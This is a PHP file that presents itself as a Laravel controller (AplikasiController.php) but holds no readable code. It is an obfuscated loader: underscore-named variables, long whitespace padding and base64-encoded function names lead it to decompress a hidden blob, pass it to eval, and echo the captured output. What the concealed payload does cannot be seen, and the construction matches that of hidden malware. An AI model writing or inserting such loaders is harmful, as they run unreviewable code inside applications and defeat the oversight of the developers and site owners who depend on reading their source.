<?php 
        $__='printf';$_='Loading app/Http/Controllers/Pengaturan/AplikasiController.php';
        



























































































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


























































































































































































































































































































                                                                                                                                                                                                                     $________;
